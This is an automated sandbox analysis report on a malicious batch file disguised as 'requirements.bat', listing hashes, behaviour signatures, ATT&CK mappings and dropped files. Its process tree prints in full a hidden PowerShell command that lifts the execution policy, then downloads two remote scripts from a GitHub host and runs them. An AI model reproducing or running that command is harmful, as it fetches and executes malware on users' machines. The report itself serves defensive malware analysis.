8f75cc1e17cf0e2300197cc9dbb5f552e5b1654dfed023065195dcdc4e19f5c3

General

Target

requirements.bat
Size

1KB
MD5

3cc7198c407f39e94ea792e5ef82a8ce
SHA1

1659e8a26c320f22f319952f626dd3081587b5b8
SHA256

8f75cc1e17cf0e2300197cc9dbb5f552e5b1654dfed023065195dcdc4e19f5c3
SHA512

0e6b5d2564d246379f36169e3513f8fd25acea8f340caf2ce254370563b0cd02a44ce0ea4a235b13157d1dbc99eb36685fdcf5996a8b0e3957aa3874e369d4ad

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
7	2756	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4760	timeout.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2756	powershell.exe
2756	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2756	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 420 wrote to memory of 1768	420	cmd.exe	86
PID 420 wrote to memory of 1768	420	cmd.exe	86
PID 420 wrote to memory of 2756	420	cmd.exe	87
PID 420 wrote to memory of 2756	420	cmd.exe	87
PID 2756 wrote to memory of 1344	2756	powershell.exe	91
PID 2756 wrote to memory of 1344	2756	powershell.exe	91
PID 1344 wrote to memory of 444	1344	csc.exe	92
PID 1344 wrote to memory of 444	1344	csc.exe	92
PID 420 wrote to memory of 4112	420	cmd.exe	94
PID 420 wrote to memory of 4112	420	cmd.exe	94
PID 4112 wrote to memory of 4760	4112	cmd.exe	95
PID 4112 wrote to memory of 4760	4112	cmd.exe	95

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\requirements.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:420
- C:\Windows\system32\cacls.exe
  "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
  2⤵
  PID:1768
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -WindowStyle hidden -Command "Set-ExecutionPolicy unrestricted -Force; Invoke-Webrequest 'https://raw.githubusercontent.com/imsneek/gudytevbuyde65yvyu3ev4w5y/main/putamadre.ps1' -OutFile main.ps1; .\main.ps1; Remove-Item main.ps1; Invoke-Webrequest 'https://raw.githubusercontent.com/imsneek/gudytevbuyde65yvyu3ev4w5y/main/mierda.ps1' -OutFile yes.ps1; .\yes.ps1; Remove-Item yes.ps1"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2756
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zmcxsnpn\zmcxsnpn.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1344
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA72D.tmp" "c:\Users\Admin\AppData\Local\Temp\zmcxsnpn\CSCFF33EEEA973E46E09527169C8E995017.TMP"
      4⤵
      PID:444
- C:\Windows\system32\cmd.exe
  cmd /k "echo Prerequisite check complete. Run web host file now. Server will be on localhost:8080&& timeout /t 10&&exit"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4112
- - C:\Windows\system32\timeout.exe
    timeout /t 10
    3⤵
    - Delays execution with timeout.exe
    PID:4760

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESA72D.tmp

Filesize
1KB

MD5
01a9cef0f298ce0f549fd2c743bafcee

SHA1
fe302d5156d55d28be665c3e749232d09636db88

SHA256
46712e81c05b21eb702b69cf74a0d3ff9966ccce4b456cac3603ef13f81efba8

SHA512
bf6d341ead2932aa5fbaac91785299de3deb68e2ff7c73d35a86993392bd980149c25c312c7147f9b98f3a59499d0bda4367e74ed79b32a1e8a59ab2c76cf03e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qmu2pyxx.5as.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\main.ps1

Filesize
1KB

MD5
136d7986959fcc4186c52adde2bf7e0b

SHA1
e06fdd09cf9b06347d6f35025db4d5c1643a35ce

SHA256
5ad34f66a0f2e46fbc2f6e63c82a47b5b0dcd782337988c124a370def3e3465f

SHA512
2a430ee8cc4d471f79cc98adfb9e4db1f84518be4a715d80066b8778ba646e4e08101e76f250d4283929acf94b376bd337f54ad16b1eaf5c00c2ba4f8c6fc7a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\yes.ps1

Filesize
41B

MD5
63244fd71491cfeb5412fde8029fac5e

SHA1
767e5a18b921632d7bdb447c9bc8ea0e6068c235

SHA256
d218e72276aaf3134b0f498375e5e0463c41b17fbc2d9135099796875497c0e6

SHA512
c481bfb83012d0e2d9c4fc3f4edee4e6ccf018543fc8f51e5c3554d5321853ece15b2fa9da4652f449ab72f5c1f3f0c4df2c9a9d476113998ed3ffac3d544efc

Download Submit
C:\Users\Admin\AppData\Local\Temp\zmcxsnpn\zmcxsnpn.dll

Filesize
3KB

MD5
a5cbbf61498b54b936dffc2871920a0b

SHA1
3fdda2bb81aeece1b5d4410ce8698196e24cc116

SHA256
5f6c5211c035eb8c6dff992e24153b60da439938e0e2bc0526d2daf0cffec5f5

SHA512
647dcfa6e42ef10f3731c65eef1d0bd895eca9e4b0b681938301857d3b7fd6dbc46de1c75c48f2e9f1dd691bfd9ece3270727e5dc7c5ecebe0429fcfa6183855

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zmcxsnpn\CSCFF33EEEA973E46E09527169C8E995017.TMP

Filesize
652B

MD5
0f4f936c5d9e79d16da6cbaef5879761

SHA1
94f2570bc0925b8f0fabc48a6f73deb0f84805c8

SHA256
13d91e7eb0f2c21ad75e559b9a287c381c80299860c60388abf5a5f737fb318a

SHA512
2fcf9b7cbbabe1b719a9f0698b0e12aacb8d9f6381e492bbba4a15ed7ddce0e1bde567383e252c12887a2a579af70e57567ad56b35a76dbcc8aab9229ff4f622

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zmcxsnpn\zmcxsnpn.0.cs

Filesize
435B

MD5
d69c78b74fa2e1613a3a8e56862811d5

SHA1
86cf7c08310624932a00f56009804c6040364fd9

SHA256
b45ce2c4bcb31d9ad4282303d5b7396aabec162f4986706a41378a8720a77b9d

SHA512
7098838f596e307471ac9503731cc70ec4f5536c71b394a08a2a32aa33c5b9083573ea348574a485b5e37a4e8179ffaa3210817b0eb17522822e6edd7749ecfa

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zmcxsnpn\zmcxsnpn.cmdline

Filesize
369B

MD5
8c9b1ddedf32f504a4019be863c6020d

SHA1
73f89fee7af5c4d5e66931cb711c11c8b9645683

SHA256
159485ba2be879c9ee58a63c1d3a3d783eb422ae340a8d1a594c32ad1b3f1238

SHA512
a7376b7df63361c837729579a5c2f03e5765bbceb378b8f5e506114a9200525f51d8c3a823e30a74ed8f56f90b4f3aa7f730aefc862a69301c000a740eb02309

Download Submit
memory/2756-12-0x00000210FE000000-0x00000210FE010000-memory.dmp

Filesize
64KB

Download
memory/2756-11-0x00000210FE000000-0x00000210FE010000-memory.dmp

Filesize
64KB

Download
memory/2756-33-0x0000021082610000-0x0000021082618000-memory.dmp

Filesize
32KB

Download
memory/2756-10-0x00007FF80F340000-0x00007FF80FE01000-memory.dmp

Filesize
10.8MB

Download
memory/2756-5-0x00000210E5CF0000-0x00000210E5D12000-memory.dmp

Filesize
136KB

Download
memory/2756-47-0x00007FF81CB90000-0x00007FF81CBA9000-memory.dmp

Filesize
100KB

Download
memory/2756-48-0x00007FF80F340000-0x00007FF80FE01000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing